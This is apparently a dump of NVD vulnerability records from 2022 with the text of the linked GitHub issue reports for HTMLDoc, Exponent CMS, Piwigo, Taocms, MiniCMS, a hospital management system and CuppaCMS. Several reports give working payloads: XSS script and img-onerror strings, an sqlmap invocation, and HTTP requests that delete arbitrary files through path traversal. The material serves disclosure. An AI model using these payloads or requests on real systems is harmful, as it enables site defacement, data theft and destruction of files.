[ { "source": "patrick@puiterwijk.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/312f0f9c12f26fbe015cd0e6cefa40e4b99017d9" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/463" }, { "source": "patrick@puiterwijk.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/312f0f9c12f26fbe015cd0e6cefa40e4b99017d9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/463" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.15:*:*:*:*:*:*:*", "matchCriteriaId": "7FA48CA3-3C4E-46CA-8B5E-FDBF99FDD55F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/michaelrsweet/htmldoc/issues/463
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
In `gif_get_code()`, in [image.cxx](https://github.com/michaelrsweet/htmldoc/blob/master/htmldoc/image.cxx), there is a stack out-of-bounds read in the following code: ```C 267 curbit = (curbit - lastbit) + 8 * last_byte; 268 last_byte += (unsigned)count; 269 lastbit = last_byte * 8; 270 } 271 272 for (ret = 0, i = curbit + (unsigned)code_size - 1, j = (unsigned)code_size; 273 j > 0; 274 i --, j --) 275 ret = (ret << 1) | ((buf[i / 8] & bits[i & 7]) != 0); ``` The expression `curbit - lastbit`, line 267, can result in an integer overflow when `lastbit > curbit`, updating `curbit` to a large number since it is unsigned. Later on line 272 the variable `i` is set to number less than `code_size`, since `curbit + (unsigned)code_size - 1` overflows, which results after a few iterations in a stack out of bounds read in `buf[i/8]`. I've attached [poc.zip](https://github.com/michaelrsweet/htmldoc/files/7829400/poc.zip) that contains a malicious gif and a html file and triggers the out of bounds read resulting in a segmentation fault. ## Steps to reproduce The following should result in a segmentation fault: ``` $ unzip poc.zip $ htmldoc --webpage -f output.pdf crash.html ``` ## Steps to analyse the crash on gdb ``` gdb --args htmldoc --webpage -f output.pdf ./crash.html # set a breakpoint on gif_get_code run continue 3 # reached the gif_get_code that will crash ```
Stack out-of-bounds read in gif_get_code()
https://api.github.com/repos/michaelrsweet/htmldoc/issues/463/comments
5
2022-01-07T14:45:56Z
2022-01-10T14:42:46Z
https://github.com/michaelrsweet/htmldoc/issues/463
1,096,381,389
463
3,187
CVE-2022-23047
2022-02-09T23:15:19.530
Exponent CMS 2.6.0patch2 allows an authenticated admin user to inject persistent JavaScript code inside the "Site/Organization Name","Site Title" and "Site Header" parameters while updating the site settings on "/exponentcms/administration/configure_site"
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://exponentcms.lighthouseapp.com/projects/61783/tickets/1459" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/franklin/" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/exponentcms/exponent-cms/issues/1546" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://exponentcms.lighthouseapp.com/projects/61783/tickets/1459" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/franklin/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/exponentcms/exponent-cms/issues/1546" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exponentcms:exponent_cms:2.6.0:patch2:*:*:*:*:*:*", "matchCriteriaId": "5A643ED1-5F73-4CDE-A28A-D321EFCAC2F5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/exponentcms/exponent-cms/issues/1546
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "exponentcms", "exponent-cms" ]
I reported 3 vulnerabilities on Exponent 2.6.0 (patch2) using https://exponentcms.lighthouseapp.com/ but i didn't receive any update. Attached below are the links to the tickets, advisories and our responsible disclosure policy respectively. - [Ticket Stored XSS (Settings)](https://exponentcms.lighthouseapp.com/projects/61783/tickets/1459-exponent-cms-260-patch2-stored-cross-site-scripting-vulnerability). - [Advisory Stored XSS (Settings)](https://fluidattacks.com/advisories/franklin/). - [Ticket File Upload RCE (New Extension)](https://exponentcms.lighthouseapp.com/projects/61783/tickets/1460-exponent-cms-260-patch2-insecure-file-upload-rce-upload-new-extension) - [Advisory File Upload RCE (New Extension)](https://fluidattacks.com/advisories/dylan/). - [Ticket Stored XSS (User-Agent)](https://exponentcms.lighthouseapp.com/projects/61783/tickets/1461-exponent-cms-260-patch2-stored-cross-site-scripting-user-agent) - [Advisory Stored XSS (User-Agent)](https://fluidattacks.com/advisories/dylan/). - [Disclosure Policy](https://fluidattacks.com/advisories/policy).
Exponent-CMS Security Issues
https://api.github.com/repos/exponentcms/exponent-cms/issues/1546/comments
2
2022-01-28T13:28:27Z
2022-02-13T01:28:49Z
https://github.com/exponentcms/exponent-cms/issues/1546
1,117,406,764
1,546
3,188
CVE-2021-45357
2022-02-10T18:15:08.383
Cross Site Scripting (XSS) vulnerability exists in Piwigo 12.x via the pwg_activity function in include/functions.inc.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1582" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1582" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "BDC77171-712D-461F-83B8-953EB077F285", "versionEndExcluding": null, "versionEndIncluding": "12.1.0", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Piwigo/Piwigo/issues/1582
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
I found that piwigo Front-End can trigger xss,it means when the system administrator can trigger xss after logging into the backend Please see below for details of the analysis at first,We found a global filter in `include/common.inc.php` ![1](https://user-images.githubusercontent.com/56486273/146197712-471df1d4-2d90-4a14-aea1-9f25d12414bd.png) it just handle GET, POST, COOKIE,then we can think whether it can be broken through other parameters Then I found out that piwigo records the user's login and logout process Take the exit process as an example(The login is also the same),in `include/functions_user.inc.php` ```php function logout_user() { global $conf; trigger_notify('user_logout', @$_SESSION['pwg_uid']); pwg_activity('user', @$_SESSION['pwg_uid'], 'logout'); $_SESSION = array(); session_unset(); session_destroy(); setcookie(session_name(),'',0, ini_get('session.cookie_path'), ini_get('session.cookie_domain') ); setcookie($conf['remember_me_name'], '', 0, cookie_path(),ini_get('session.cookie_domain')); } ``` After that, let's see what the `pwg_activity` function does in `include/functions.inc.php` in this function,There is no filter parameter `$_SERVER['HTTP_USER_AGENT']` ![2](https://user-images.githubusercontent.com/56486273/146197730-c50fbedc-3493-4578-88f8-d133ff3d0679.png) then execute serialize and pwg_db_real_escape_string functions respectively ![3](https://user-images.githubusercontent.com/56486273/146197780-bb7b5034-9e65-4838-9dec-86f1d888e10b.png) look at function(pwg_db_real_escape_string),it just prevent sql injection ```php function pwg_db_real_escape_string($s) { return mysql_real_escape_string($s); } ``` then we register a user`yyds\yyds` ![4](https://user-images.githubusercontent.com/56486273/146197857-7db7d57f-4fe7-4571-a2aa-f055acf0c318.png) then we click `logout` ![5](https://user-images.githubusercontent.com/56486273/146197874-1fb0bf17-1a84-41d4-ae11-0b1e1442f860.png) then we just post like this,It is best to send more packages ![6](https://user-images.githubusercontent.com/56486273/146197891-df638a27-76c9-472f-97e3-bee9661abdd0.png) ```cmd url:http://test.y4tacker.top/identification.php User-Agent:"><script>alert(`Hacked By Y4tacker`)</script><" POST: username=yyds&password=yyds&redirect=%2F&login=submit ``` Next, after the system administrator has logged in,and visit `http://xxx/admin.php?page=user_activity` ![7](https://user-images.githubusercontent.com/56486273/146197909-92fd89ba-7136-49fc-a13d-e803f8ce8634.png) and look it ![8](https://user-images.githubusercontent.com/56486273/146197926-a858933b-02cb-410f-b992-36d5dd119292.png)
[Version <= 12.1.0]XSS vulnerability in the frontend
https://api.github.com/repos/Piwigo/Piwigo/issues/1582/comments
1
2021-12-15T13:48:11Z
2022-02-10T23:29:34Z
https://github.com/Piwigo/Piwigo/issues/1582
1,081,062,458
1,582
3,189
CVE-2021-44969
2022-02-10T23:15:07.957
Taocms v3.0.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the Management Column component.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/taogogo/taocms/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
First, we enter the background and use the column administrator admin we created: ![image](https://user-images.githubusercontent.com/73013511/145394597-d8b9668d-d214-400c-858a-b5f0c9cf9815.png) Let's click "add article" on the left: ![image](https://user-images.githubusercontent.com/73013511/145394730-a937a5d6-f21c-42be-9bd0-295af010a9a6.png) Insert xss payload at the title :<img src=x onerror="top.alert(0)"></img> Return to the background management page,Let's click "edit article" on the left: ![image](https://user-images.githubusercontent.com/73013511/145395007-986370d3-ca14-4dff-b2c2-586875c9f754.png) Come back to the front page,Because it is the title of the article, the front desk is also affected ![image](https://user-images.githubusercontent.com/73013511/145395248-ad96faff-caf8-4b12-b710-a89e38b5d905.png)
There is a storage type cross site scripting attack at "Management column"(Column administrator authority)
https://api.github.com/repos/taogogo/taocms/issues/9/comments
0
2021-12-09T12:19:43Z
2021-12-09T12:21:34Z
https://github.com/taogogo/taocms/issues/9
1,075,509,639
9
3,190
CVE-2021-44970
2022-02-10T23:15:07.997
MiniCMS v1.11 was discovered to contain a cross-site scripting (XSS) vulnerability via /mc-admin/page-edit.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/43" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:1234n:minicms:1.11:*:*:*:*:*:*:*", "matchCriteriaId": "EFF126BA-FB8A-4D2A-8B51-D19BF0F8C301", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/bg5sbk/MiniCMS/issues/43
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bg5sbk", "MiniCMS" ]
First , Click to enter the creation page ![image](https://user-images.githubusercontent.com/73013511/145502664-b71365dd-4432-49bd-8131-a68c7329d10a.png) Then, enter XSS payload in the content bar and Remember to choose publish ![image](https://user-images.githubusercontent.com/73013511/145502794-fabeef7a-02a2-4aaf-a84f-ea2490ca3d28.png) Click to view ![image](https://user-images.githubusercontent.com/73013511/145502849-18c02dee-4be9-4725-81e3-6a5d0149a9ee.png) OK! ![image](https://user-images.githubusercontent.com/73013511/145502882-df6b87d6-272c-4288-bf89-45834f612d6b.png)
An xss vulnerability was found where my Page was posted
https://api.github.com/repos/bg5sbk/MiniCMS/issues/43/comments
0
2021-12-10T01:40:31Z
2021-12-10T01:40:31Z
https://github.com/bg5sbk/MiniCMS/issues/43
1,076,310,311
43
3,191
CVE-2022-24646
2022-02-10T23:15:08.043
Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/contact.php via the txtMsg parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/18" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.nu11secur1ty.com/2022/02/cve-2022-24263.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.nu11secur1ty.com/2022/02/cve-2022-24263.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA36E354-4DBF-4BE4-9BC4-CB00C6771BAF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/kishan0725/Hospital-Management-System/issues/18
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kishan0725", "Hospital-Management-System" ]
![image](https://user-images.githubusercontent.com/73013511/152641599-35c88429-f152-4343-9166-8da4da1fa7a9.png) Intercept contact info and save contents into a text file(1.txt). ![image](https://user-images.githubusercontent.com/73013511/152641606-ac0cd465-3a4a-4a43-9011-89e085134863.png) Run SQLmap ``` python3 .\sqlmap.py -r .\1.txt ``` ![image](https://user-images.githubusercontent.com/73013511/152641612-2225c26e-c340-45dd-9cf2-18c14209a476.png) Area of concern in contact.php ![image](https://user-images.githubusercontent.com/73013511/152641616-1c5f517a-00f5-4004-b387-9a29ced2cb2c.png)
VULNERABLE: SQL Injection exists in Hospital-Management-System. An attacker can inject query in “/Hospital-Management-System-master/contact.php" via the ‘txtMsg’ parameters.
https://api.github.com/repos/kishan0725/Hospital-Management-System/issues/18/comments
1
2022-02-05T12:14:10Z
2022-02-11T02:56:44Z
https://github.com/kishan0725/Hospital-Management-System/issues/18
1,124,915,004
18
3,192
CVE-2022-24647
2022-02-10T23:15:08.083
Cuppa CMS v1.0 was discovered to contain an arbitrary file deletion vulnerability via the unlink() function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/CuppaCMS/CuppaCMS/issues/23
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery: 06 Feb 2022 Product version:cuppaCMS v1.0[Download link](http://cuppacms.com/files/cuppa_cms.zip) Author: lyy Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept 1 Vulnerable URL: http://cuppacms/js/filemanager/api/index.php Vulnerable Code: line 116,118 - cuppacms/js/filemanager/api/FileManager.php ![image](https://user-images.githubusercontent.com/73013511/152651442-b5877979-3514-4de3-87e6-03eb3d91550c.png) Steps to Reproduce: 1.Send the request directly through burp ``` POST /js/filemanager/api/index.php HTTP/1.1 Host: cuppacms Content-Length: 45 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/json Accept: */* Origin: http://cuppacms Referer: http://cuppacms/js/filemanager/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"path":"/../test.php","action":"deleteFile"} ``` ![image](https://user-images.githubusercontent.com/73013511/152651770-251bc12c-4934-423c-86a9-18fe254c7a51.png) 2.You can traverse the directory to delete any file Proof of Concept 2 Vulnerable URL: http://cuppacms/js/filemanager/api/index.php Vulnerable Code: line 124,138 - cuppacms/js/filemanager/api/FileManager.php ![image](https://user-images.githubusercontent.com/73013511/152651571-11f2ac07-17b4-4823-93c3-d6f52435c239.png) Steps to Reproduce: 1.Send the request directly through burp ``` POST /js/filemanager/api/index.php HTTP/1.1 Host: cuppacms Content-Length: 40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/json Accept: */* Origin: http://cuppacms Referer: http://cuppacms/js/filemanager/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"path":"/../1","action":"deleteFolder"} ``` ![image](https://user-images.githubusercontent.com/73013511/152651695-bba1ea44-1216-4a7a-b026-0f8d58eff9db.png) 2.You can traverse directories and delete directories,Delete all files in the directory while deleting the directory, so as to achieve the effect of deleting any file
Multiple Unauthorized Arbitrary File Deletion vulnerabilities
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/23/comments
0
2022-02-05T17:14:57Z
2022-02-05T17:17:36Z
https://github.com/CuppaCMS/CuppaCMS/issues/23
1,124,983,447
23
3,193
CVE-2020-36062
2022-02-11T16:15:08.557
Dairy Farm Shop Management System v1.0 was discovered to contain hardcoded credentials in the source code which allows attackers access to the control panel if compromised.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/VivekPanday12/CVE-/issues/3" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://phpgurukul.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/VivekPanday12/CVE-/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://phpgurukul.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/" } ]
